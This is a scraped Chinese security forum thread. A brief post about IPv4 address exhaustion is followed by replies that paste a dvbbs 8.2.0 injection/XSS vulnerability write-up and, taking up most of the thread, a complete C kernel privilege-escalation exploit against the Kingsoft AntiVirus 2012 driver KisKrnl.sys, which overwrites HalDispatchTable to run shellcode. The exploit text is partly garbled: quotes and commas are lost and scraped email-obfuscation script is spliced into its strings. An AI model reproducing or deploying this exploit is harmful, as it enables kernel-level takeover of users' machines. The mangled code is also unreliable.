返回列表 发帖

IP地址即将用光

谷歌公司工程师洛伦索·科利蒂告诉**,在未来数周内,IP地址便将完全用光,IP地址用完后,如果互联网终端用户持续增加,将可能出现共享IP地址用户网速变慢的情形,而对于那些使用移动互联网终端的用户,将出现无法上网的可能“但互联网不至于瘫痪”。

 

您可能还想看的主题:

危险的SEO中毒攻击

雅虎年底升级IPv6标准:或影响100万用户访问

谷歌雅虎等宣布6月24日为全球IPv6测试日

安全宝招聘安全服务工程师

非安全5周年纪念 团队T恤出炉

关于信息安全等级保护

美国发明了网络数字大炮,可摧毁整个互联网

Discuz! X2.5 远程代码执行漏洞及EXP

SpyEye 1.3.45 Loader源代码下载

一种防注入代码的绕过学习总结

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

TOP

雅虎年底升级IPv6标准:或影响100万用户访问

TOP

动网论坛(dvbbs8.2.0)博客插件XSS漏洞
影响版本:dvbbs 8.2.0最新版本(直接在动网论坛下的最新程序)

漏洞文件:
1.bokemanage.asp&bokepostings.asp

2.BokeSearch.asp 两个漏洞原理一样的
官网文件已删除了

漏洞出现位置:
bokepostings.asp大约270行部分代码
###########################################
P_Catid = Request.Form("Catid")
P_Lock = DvBoke.CheckNumeric(Request.Form("Lock"))
P_Best = DvBoke.CheckNumeric(Request.Form("Best"))
P_PostContent = CheckAlipay()
If P_PostContent = "" Then P_PostContent = DvBoke.Checkstr(Request.Form("PostContent"))
P_PostTitleNote = DvBoke.Checkstr(Request.Form("PostTitleNote")) //问题出现在这里
PostID = DvBoke.CheckNumeric(Request.Form("PostID"))
RootID = DvBoke.CheckNumeric(Request.Form("RootID"))
P_Weather = DvBoke.CheckNumeric(Request.Form("Weather"))

###########################################
bokemanage.asp文件的部分代码大约290行

###########################################

P_Lock = DvBoke.CheckNumeric(Request.Form("Lock"))
P_Best = DvBoke.CheckNumeric(Request.Form("Best"))
P_PostContent = CheckAlipay()
If P_PostContent = "" Then P_PostContent = DvBoke.Checkstr(Request.Form("PostContent"))
P_PostTitleNote = DvBoke.Checkstr(Request.Form("PostTitleNote")) //问题出现在这里
PostID = DvBoke.CheckNumeric(Request.Form("PostID"))

###########################################

下面是checkstr()函数中的代码

###########################################

Public Function Checkstr(Str)
If Isnull(Str) Then            

CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")         

CheckStr = Replace(Str,"'","''")        //用"替换'
End Function

###########################################

下面是BokeSearch.asp 中的部分代码

###########################################

SelType = DvBoke.CheckNumeric(Request("Sel"))
KeyWord = DvBoke.Checkstr(Request("KeyWord")) // 同样用checkstr()函数过滤
DYear = DvBoke.CheckNumeric(Request("DY"))
DMonth = DvBoke.CheckNumeric(Request("DM"))

........

If KeyWord<>"" Then
Select Case SelType
Case 2 '内容
    SqlStr = SqlStr &amp;" and Content like '%"&amp;KeyWord&amp;"%'"
Case 1 '作者
    SqlStr = SqlStr &amp;" and UserName like '%"&amp;KeyWord&amp;"%'"
Case Else '标题
    SqlStr = SqlStr &amp;" and Title like '%"&amp;KeyWord&amp;"%'"
End Select

绕过'过滤就可以注入了............



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

金山毒霸2012<= 2011.7.8.913 本地内核特权提升漏洞
金山杀毒软件 2012 KisKrnl.sys 2011.7.8.913 Local Kernel Mode Privilege Escalation Exploit  发布时间: 2011-7-23  漏洞作者 : MJ0011  软件版本: Kingsoft AntiVirus 2012  测试环境: Windows XP SP3  细节:  In KisKrnl.sys s hook function of NtQueryValueKey  it directly write to the buffer of ResultLength without any check  //**KisKrnl.sys消息钩子函数未对直接写入缓冲区的结果长度作任何检测**//EXPLOIT 代码:




#include stdafx.h  
#include windows.h  
typedef struct _UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength;  
    PWSTR  Buffer;  
} UNICODE_STRING;  
typedef UNICODE_STRING *PUNICODE_STRING;  
#define RTL_CONSTANT_STRING(s) { sizeof( s ) - sizeof( (s)[0] ) sizeof( s ) s }  
typedef const UNICODE_STRING *PCUNICODE_STRING;  
UNICODE_STRING name = RTL_CONSTANT_STRING(L123);  
#include malloc.h  
PVOID GetInfoTable(ULONG ATableType)  
{  
ULONG mSize = 0x4000;  
PVOID mPtr = NULL;  
LONG status;  
HMODULE hlib = GetModuleHandle(ntdll.dll);  
PVOID pZwQuerySystemInformation = GetProcAddress(hlib  ZwQuerySystemInformation);  
do  
{  
mPtr = malloc(mSize);  
if (mPtr)  
{  
__asm  
{  
push 0  
push mSize  
push mPtr  
push ATableType  
call pZwQuerySystemInformation  
mov status  eax  
}  
}  
else  
{  
return NULL;  
}  
if (status == 0xc0000004)  
{  
free(mPtr);  
mSize = mSize * 2;  
}  
} while (status == 0xc0000004);  
if (status == 0)  
{  
return mPtr;  
}  
free(mPtr);  
return NULL;  
}  
enum { SystemModuleInformation = 11  
SystemHandleInformation = 16 };  
typedef struct {  
    ULONG   Unknown1;  
    ULONG   Unknown2;  
    PVOID   Base;  
    ULONG   Size;  
    ULONG   Flags;  
    USHORT Index;  
    USHORT NameLength;  
    USHORT LoadCount;  
    USHORT PathLength;  
    CHAR    ImageName[256];  
} SYSTEM_MODULE_INFORMATION_ENTRY *PSYSTEM_MODULE_INFORMATION_ENTRY;  
typedef struct {  
    ULONG   Count;  
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];  
} SYSTEM_MODULE_INFORMATION *PSYSTEM_MODULE_INFORMATION;  
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);  
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);  
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(  
ULONG x1  
ULONG y1  
ULONG x2  
ULONG y2  
ULONG color  
    );  
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(  
ULONG Color  
    );  
typedef  
VOID  
(*INBV_DISPLAY_STRING_FILTER)(  
PUCHAR *Str  
    );   
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(  
    INBV_DISPLAY_STRING_FILTER DisplayStringFilter  
    );  
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(  
    BOOLEAN bEnable  
    );  
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(  
    ULONG x1  
    ULONG y1  
    ULONG x2  
    ULONG y2  
    );  
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(  
    PUCHAR Str  
    );  
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;   
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;   
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;   
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;   
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;   
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;   
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;   
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;   
#define VGA_COLOR_BLACK 0  
#define VGA_COLOR_RED 1  
#define VGA_COLOR_GREEN 2  
#define VGA_COLOR_GR 3  
#define VGA_COLOR_BULE 4  
#define VGA_COLOR_DARK_MEGAENTA 5  
#define VGA_COLOR_TURQUOISE 6  
#define VGA_COLOR_GRAY 7  
#define VGA_COLOR_BRIGHT_GRAY 8  
#define VGA_COLOR_BRIGHT_RED 9  
#define VGA_COLOR_BRIGHT_GREEN 10  
#define VGA_COLOR_BRIGHT_YELLOW 11  
#define VGA_COLOR_BRIGHT_BULE 12  
#define VGA_COLOR_BRIGHT_PURPLE 13  
#define VGA_COLOR_BRIGHT_TURQUOISE 14  
#define VGA_COLOR_WHITE 15  
UCHAR DisplayString[] =   
                                                                                 
                                                                                 
                                                                                 
                ---- ===== EXPLOIT SUCCESSFULLY ==== ----                        
                                                                                 
                                                                                 
Kingsoft AntiVirus 2012 Sandbox Local Privilege Escalation Exploit               
                                                                                 
VULNERABLE PRODUCT                                                               
                                                                                 
Kingsoft AntiVirus 2012                                                         
                                                                                 
                                                                                 
VULERABLE FILE                                                                  
KisKnl.sys <= 2011.7.8.913                                                      
                                                                                 
AUTHOR                                                                           
                                                                                 
MJ0011                                                                           
th_decoder@126.com<SCRIPT type=text/_(使用时去掉_)javascript_>
/* <![CDATA[ */
(function(){try{var saijrcl=document.getElementById(__cf_email__);a=l.className;if(a){s=;r=parseInt(a.substr(02)16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j2)16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(sl);}}catch(e){}})();
/* ]]> */
</SCRIPT>                                                               
                                                                                 
2011-2-21                                                                        
                                                                                 
                                                                                 
                                                                                ;  
VOID InbvShellCode()  
{  
//DISABLE INTERRUPT   
__asm  
{  
cli  
}  
//RESET TO VGA MODE  
InbvAcquireDisplayOwnership();  
InbvResetDisplay();  
//FILL FULL SCREEN  
InbvSolidColorFill(0  0  639  479 VGA_COLOR_BLACK);  
//SET TEXT COLOR  
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);  
InbvInstallDisplayStringFilter(NULL);  
InbvEnableDisplayString(TRUE);      
InbvSetScrollRegion( 0  0  639 477);   
InbvDisplayString(DisplayString);  
while(TRUE)  
{     
};      
}  
BOOL InbvInit(PVOID ntosbase  PSTR ntosname)  
{  
HMODULE hlib = LoadLibrary(ntosname);  
if (hlib == NULL)  
{  
return FALSE ;   
}   
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib  InbvAcquireDisplayOwnership) - (ULONG)hlib + (ULONG)ntosbase);  
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib  InbvResetDisplay) - (ULONG)hlib + (ULONG)ntosbase);  
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib  InbvSolidColorFill) - (ULONG)hlib + (ULONG)ntosbase);  
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib  InbvSetTextColor) - (ULONG)hlib + (ULONG)ntosbase);  
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib  InbvInstallDisplayStringFilter) - (ULONG)hlib + (ULONG)ntosbase);  
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib  InbvEnableDisplayString) - (ULONG)hlib + (ULONG)ntosbase);  
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib  InbvSetScrollRegion) - (ULONG)hlib + (ULONG)ntosbase);  
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib  InbvDisplayString) - (ULONG)hlib + (ULONG)ntosbase);  
if (InbvAcquireDisplayOwnership &amp;&amp;  
InbvResetDisplay &amp;&amp;  
InbvSolidColorFill &amp;&amp;  
InbvSetTextColor &amp;&amp;  
InbvInstallDisplayStringFilter &amp;&amp;  
InbvEnableDisplayString &amp;&amp;  
InbvSetScrollRegion &amp;&amp;  
InbvDisplayString)  
{  
return TRUE ;   
}  
return FALSE ;   
}  
typedef LONG (WINAPI *PNT_ALLOCATE_VIRTUAL_MEMORY)(  
  HANDLE ProcessHandle  
  PVOID *BaseAddress  
  ULONG_PTR ZeroBits  
  PSIZE_T RegionSize  
  ULONG AllocationType  
  ULONG Protect  
  );  
int main(int argc char* argv[])  
{   
printf(Kingsoft AntiVirus 2012 SandBox Local Privilege Escalation Exploit
  
KisKnl.sys <= 2011.7.8.913
  

By MJ0011
th_decoder@126.com<SCRIPT type=text/_(使用时去掉_)javascript_>
/* <![CDATA[ */
(function(){try{var saijrcl=document.getElementById(__cf_email__);a=l.className;if(a){s=;r=parseInt(a.substr(02)16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j2)16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(sl);}}catch(e){}})();
/* ]]> */
</SCRIPT>
PRESS ENTER
);
   
getchar();  
//for init invb shell code  
PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);  
if (pinfo==0)  
{  
printf(cannot get system info
);  
return 0 ;   
}  
if (!InbvInit(pinfo->Module[0].Base  strrchr(pinfo->Module[0].ImageName  \) + 1))  
{  
printf(cannot init inbv system!
);  
return 0 ;   
}  

//get ntqueryvaluekey     
PVOID p = GetProcAddress(GetModuleHandle(ntdll.dll)  NtQueryValueKey);  
//alloc shellcode jump  

PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle(ntdll.dll)  NtAllocateVirtualMemory);  
   
PVOID BaseAddress = (PVOID)0x1 ;   
ULONG dwsize = 0x1000 ;   
LONG status ;   
status = NTAllocateVM  
(  
GetCurrentProcess()   
&amp;BaseAddress   
0   
&amp;dwsize   
MEM_COMMIT | MEM_RESERVE   
PAGE_READWRITE  
);  

if (status !=0)  
{  
printf(err alloc vm %08x
status);  
getchar();  
return 0 ;   
}  
//result length always <=0x800  
//0~0x800: NOP  
//0x800: shell code  
memset((PVOID)0x0  0x90  0x1000);  
*(BYTE*)((ULONG)0x800) = 0xe9 ;   
*(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ;   
//get haldispatchtable  
   
HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName  \)+1);  
if (hntos == 0 )  
{  
printf(cannot load ntos
);  
getchar();  
return 0 ;   
}  
PVOID pHalDispatchTable = GetProcAddress(hntos  HalDispatchTable);  
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);  
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);  
PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));  
FreeLibrary(hntos);  
//create sandboxed key / value  
HKEY hkey ;   
ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER  Software  0  KEY_READ  &amp;hkey);  
if (err!=ERROR_SUCCESS)  
{  
printf(open key read failed %u
err);  
getchar();  
return 0 ;   
}  
HKEY hkey2 ;   
   
err = RegOpenKeyEx(HKEY_CURRENT_USER  Software  0  KEY_WRITE  &amp;hkey2);  
if (err != ERROR_SUCCESS)  
{  
printf(open key write failed %u
err);  
getchar();  
return 0 ;   
}  
DWORD dd ;   
   
err = RegSetValueEx(hkey2  123  0  REG_DWORD  (CONST BYTE*)&amp;dd  sizeof(DWORD));  
if (err != ERROR_SUCCESS)  
{  
printf(set value %u
  err);  
getchar();   
return 0 ;  
}  
//overwrite xhal   
BYTE buffer[100];  
PVOID pbuf = buffer ;   
__asm  
{  
push xHalQuerySystemInformationAddr  
push 100  
push pbuf  
push 2  
lea eaxname  
push eax  
push hkey  
call p  
}  
   
//fire our shell code   
PVOID pqi = GetProcAddress(GetModuleHandle(ntdll.dll )  NtQueryIntervalProfile);  
__asm  
{  
push 0   
push 2  
call pqi   
}  
return 0;  
}
复制代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

楼主强呀,这样贴子也能发表出来,对你佩服之心比长江的水还多哦


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表